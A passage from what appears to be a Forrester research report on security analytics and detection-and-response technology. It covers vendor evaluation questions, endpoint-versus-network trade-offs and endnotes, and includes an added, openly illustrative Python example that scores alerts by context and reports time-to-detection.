    What visualization capabilities exist to enhance analysis (similar to the user experienceof Paterva Maltego or Tableau Software)? Does graph analysis exist?

    What pivoting capabilities exist? Can analyst pivot and drill down into new data whilepreserving previous searches/queries?

    Does the SA reporting include templates for time-to-detection?

    What integrations facilitate action? What detective and preventive security controlintegrations exist? What APIs exist for custom integrations?

    Solutions:

    Commercial Alert Logic, BAE Applied Intelligence Cyber Reveal, Cloudera, FireEye Threat AnalyticsPlatform, IBM i2 Analysts Notebook, Palantir, Splunk, Sumo Logic, traditional SIM/SIEMlike LogRhythm, IBM Qradar, McAfee, HP ArcSight

    Open source Apache Hadoop, OSSIM
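The alert-triage and time-to-detection criteria in Figure 6 ask how internal context (asset value, vulnerabilities present, identity) and external context (threat intelligence, real-world exploitation) feed prioritization. The Python below is an added example, not code from the report or from any vendor named in it: the asset inventory, indicator feed, alerts and the CVE id are constructed, and the scoring weights are illustrative assumptions.

```python
"""Context-driven alert triage of the kind the Figure 6 evaluation criteria ask about.
Inventories, feeds, alerts and the CVE id are constructed sample data; the weights are
illustrative assumptions, not any vendor's algorithm."""
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

@dataclass
class Alert:
    alert_id: str
    host: str
    user: str
    dest_ip: str
    cve: Optional[str]
    first_activity: datetime  # earliest evidence of the activity in the data
    detected_at: datetime     # when the analytics platform raised the alert

# Internal context (constructed): asset value 1-10, known vulnerabilities, privileged identities
ASSET_VALUE = {"dc01": 10, "fileserver": 6, "laptop-42": 3}
HOST_VULNS = {"fileserver": {"CVE-0000-0000"}}  # placeholder CVE id
PRIVILEGED_USERS = {"svc_backup", "da_admin"}
# External context (constructed): indicator feed and CVEs seen exploited in the wild
INDICATOR_FEED = {"203.0.113.7": "feed-A"}
EXPLOITED_IN_WILD = {"CVE-0000-0000"}

def triage_score(alert):
    """Fold internal and external context into a 0-100 priority plus the reasons behind it."""
    value = ASSET_VALUE.get(alert.host, 1)  # unknown hosts default to the lowest value
    score, reasons = value * 4, [f"asset value {value}"]
    if alert.user in PRIVILEGED_USERS:
        score += 20
        reasons.append("privileged account involved")
    if alert.cve and alert.cve in HOST_VULNS.get(alert.host, set()):
        score += 15
        reasons.append("host is vulnerable to the referenced CVE")
        if alert.cve in EXPLOITED_IN_WILD:  # external context raises the priority further
            score += 15
            reasons.append("CVE exploited in the wild")
    if alert.dest_ip in INDICATOR_FEED:
        score += 25
        reasons.append(f"destination matches indicator from {INDICATOR_FEED[alert.dest_ip]}")
    return min(score, 100), reasons

def time_to_detection(alerts):
    """Time-to-detection report: hours from first activity to detection, per alert and on average."""
    per_alert = {a.alert_id: (a.detected_at - a.first_activity).total_seconds() / 3600 for a in alerts}
    mean = sum(per_alert.values()) / len(per_alert) if per_alert else 0.0
    return {"per_alert": per_alert, "mean_hours": mean}

SAMPLE_ALERTS = [  # constructed alerts
    Alert("A-1", "dc01", "da_admin", "203.0.113.7", None, datetime(2014, 7, 1, 8), datetime(2014, 7, 1, 20)),
    Alert("A-2", "fileserver", "jdoe", "198.51.100.9", "CVE-0000-0000", datetime(2014, 7, 2), datetime(2014, 7, 3)),
    Alert("A-3", "laptop-42", "jdoe", "198.51.100.9", None, datetime(2014, 7, 2, 6), datetime(2014, 7, 2, 12)),
]
```

Sorting SAMPLE_ALERTS by triage_score puts the privileged-account activity on the domain controller that matches an indicator first, ahead of the vulnerable file server and the laptop.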

BALANCE THE PILLARS BASED ON YOUR NEEDS

One of the most common questions clients ask Forrester is "Where do we start?" Chances are you don't have very many of the necessary technology components of each pillar deployed in your environment. To help you decide how to start, ask and answer the following questions:

Do we benefit from prioritizing network or endpoint controls first? Although NAV solutions can provide visibility into key networks, network security controls such as these aren't sufficient. You also need visibility into the endpoint. There are benefits and limitations to each, and while you need both perspectives, you may not have the budget and the staff to do both, so you'll have to prioritize (see Figure 7). For most organizations, network controls provide quick wins that greatly improve visibility.

Do we have sufficient protections on the endpoint? You can leverage network controls to gain quick wins, but that doesn't mean you must delay implementing new endpoint controls based on use cases. Forrester recommends starting off by deploying preventive controls to high-value targets like domain controllers and other critical assets. Next, apply EVC to laptops that move in and out of your environment. A company like Bit9 can cover each use case with its traditional preventive whitelisting offering combined with the visibility of its Carbon Black acquisition.[20] You can consider companywide EVC deployments to give you maximum visibility, but the expense and operational costs of this are probably not the best use of your limited resources, unless you already have capabilities in the other pillars.


How do we best plan the transition from SIM/SIEM to SA? The migration from SIM/SIEM to SA is going to take time. SA is in its infancy; there are no turnkey solutions out there. To build a solid foundation for your SA migration, focus on staff. You must have data analytics capabilities. It would also be helpful to start your analytics projects on structured data first. Rushing to do analytics on unstructured data without first having effective people, process, and technology will be challenging. As we stated above, analytics capabilities are also developing within individual security controls, so take advantage of this. Work with your current vendors, find out how they're building upon their analytic capabilities, and then take advantage of them.

How much should we spend on malware analysis? Malware analysis plays a role in the detection of attacks, but against sophisticated adversaries, it has diminishing returns. So how should you prioritize your investment? Depending on your threat model, deploying NAV capabilities at Internet ingress/egress first could offer better returns on your security investment. Malware analysis that is embedded as a feature in a broader offering allows you to acquire multiple pillars at once, potentially saving money for investment in another pillar.

Figure 7 You Must Balance Endpoint And Network Security Controls

Source: Forrester Research, Inc.

Endpoint approach

Benefits
- Visibility beyond the perimeter; follows endpoints in the extended enterprise
- Expedites response; able to determine if a host has been compromised
- Endpoint visibility can improve mean time-to-detection; endpoint prevention can stop execution of malicious activity/behavior

Limitations
- Something else on the endpoint; has the traditional endpoint security challenge
- Consumerization (BYOD/BYOC) deployment challenges

Network approach

Benefits
- Out-of-band deployments offer a quick, transparent way to get visibility
- Avoids the challenges associated with endpoint security deployments

Limitations
- No visibility when endpoints are outside the perimeter (unless SaaS is used)
- Challenges determining the impact on the endpoint
- Scalability challenges for distributed enterprises; direct-to-Net exacerbates this


WHAT IT MEANS

DETECTION AND RESPONSE REQUIRE AN INTEGRATED TECHNOLOGY STACK

It's important that you develop a road map for building out each of the technology pillars. Remember that creating an integrated portfolio that enables orchestration should be a core tenet of your architectural, process, and product/service decisions.[21] When evaluating technology, prioritize vendors that offer multiple pillars as well as those that have third-party integrations that make operationalizing the solution effective. You don't necessarily need a single pane of glass, but you should have a common user experience. This will help you avoid amassing point products that add more overhead than security control. Without an integrated technology stack, you will never be able to improve time-to-detection, containment, and remediation.

SUPPLEMENTAL MATERIAL

Methodology

Forrester's Forrsights Security Survey, Q2 2013, was fielded to 2,134 IT executives and technology decision-makers located in Canada, France, Germany, the UK, and the US from SMB and enterprise companies with two or more employees. This survey is part of Forrester's Forrsights for Business Technology and was fielded from March 2013 to June 2013. ResearchNow fielded this survey online on behalf of Forrester. Survey respondent incentives include points redeemable for gift certificates. We have provided exact sample sizes in this report on a question-by-question basis.

Forrester's Business Technographics provides demand-side insight into the priorities, investments, and customer journeys of business and technology decision-makers and the workforce across the globe. Forrester collects data insights from qualified respondents in 10 countries spanning the Americas, Europe, and Asia. Business Technographics uses only superior data sources and advanced data-cleaning techniques to ensure the highest data quality.

ENDNOTES

1 Source: BusinessDictionary.com (http://www.businessdictionary.com/definition/Pareto-principle.html). The Pareto principle states that for many events, roughly 80% of the effects come from 20% of the causes.

2 We have covered alternatives to antivirus in depth in a previous report. See the June 9, 2014, "Prepare For The Post-AV Era Part 1: Five Alternatives To Endpoint Antivirus" report.

3 We have covered the acquisition of Cyvera in depth in a previous report. See the March 25, 2014, "Quick Take: Palo Alto Networks Acquires Cyvera" report.

4 Source: "Exploit switches off Microsoft EMET's protection features," Help Net Security (http://www.net-security.org/secworld.php?id=17080). For further explanation of this concept, please read the recent Offensive Security article, "Disarming Enhanced Mitigation Experience Toolkit (EMET)." Source: Offensive Security (http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet/).

5 This is one of the primary reasons that many intrusion prevention systems (IPS) are deployed as intrusion detection systems (IDS). No one wants to block valid applications from being used.

6 Security leaders must realize that human factors contribute to the success of a security control as much as the risk reduction of the security control itself. Security leaders who choose to ignore human factors run the risk of user security mistakes and even a full security breach. There are three human factors that contribute to the success of a security control and six human factors that act as resistors to effectiveness. For more information, see the May 28, 2014, "Raise The Security Bar With Human-Factor-Friendly Design Concepts" report.

7 Source: Kyle Russell, "A16z Invests $90 Million In Tanium, An Enterprise Systems Management Startup," TechCrunch, June 22, 2014 (http://techcrunch.com/2014/06/22/a16z-invests-90-million-in-tanium-an-enterprise-systems-management-startup/).

8 Habit No. 1: Are self-aware; Habit No. 2: Understand technology benefits and limitations; Habit No. 3: Establish realistic reporting and metrics; Habit No. 4: Are scalable; Habit No. 5: Collaborate internally and externally; Habit No. 6: Actively engage executives; and Habit No. 7: Operate with autonomy. See the April 17, 2013, "Seven Habits Of Highly Effective Incident Response Teams" report.

9 We have covered the role of threat intelligence in depth in a previous report. See the January 15, 2013, "Five Steps To Build An Effective Threat Intelligence Capability" report.

10 For more information on how to act on this intelligence, please see the January 15, 2013, "Five Steps To Build An Effective Threat Intelligence Capability" report.

11 Source: Sai Omkar Vashisht and Abhishek Singh, "Turing Test In Reverse: New Sandbox-Evasion Techniques Seek Human Interaction," FireEye Blog, June 24, 2014 (http://www.fireeye.com/blog/technical/malware-research/2014/06/turing-test-in-reverse-new-sandbox-evasion-techniques-seek-human-interaction.html).

12 We have covered the key components of a Zero Trust network in depth in a previous report. See the November 15, 2012, "Build Security Into Your Network's DNA: The Zero Trust Network Architecture" report.

13 We have covered NAV tools in depth in a previous report. See the January 24, 2011, "Pull Your Head Out Of The Sand And Put It On A Swivel: Introducing Network Analysis And Visibility" report.

14 We have covered the convergence of some NAV and SIM/SIEM tools in a previous report. See the August 9, 2012, "Dissect Data To Gain Actionable INTEL" report.

15 We have covered the characteristics of several EVC solutions in depth in a previous report. See the June 9, 2014, "Prepare For The Post-AV Era Part 1: Five Alternatives To Endpoint Antivirus" report.

16 Source: Brian Krebs, "Security Firm Bit9 Hacked, Used To Spread Malware," Krebs on Security, February 8, 2013 (http://krebsonsecurity.com/2013/02/security-firm-bit9-hacked-used-to-spread-malware/).

17 From "Dissect Data To Gain Actionable INTEL": "The real value of SIM, and its survival, depends on big data analytics for situational awareness. Known as security analytics (SA), it involves looking beyond network security data to include the collection and analysis of new types of IT data that will transform SIM into an SA tool that provides both security and IT analytics. For S&R professionals, context is key to security analytics. This will help identify events that are happening now but also assess the state of security within the enterprise in order to predict what may occur in the future and make proactive security decisions." See the August 9, 2012, "Dissect Data To Gain Actionable INTEL" report.

18 Source: "CrowdStrike Releases Endpoint Activity Monitoring Application," CrowdStrike press release, February 20, 2014 (http://www.crowdstrike.com/news/crowdstrike-releases-endpoint-activity-monitoring-application/index.html).

19 We have covered the acquisition of NetCitadel in depth in a previous report. See the June 19, 2014, "Brief: Proofpoint Strengthens Its Targeted Attack Defense With NetCitadel Acquisition" report.

20 We have covered the merger of Bit9 and Carbon Black in depth in a previous report. See the February 14, 2014, "Quick Take: Bit9 And Carbon Black Merge" report.

21 The fourth tier in the targeted-attack hierarchy of needs: an integrated portfolio that enables orchestration.
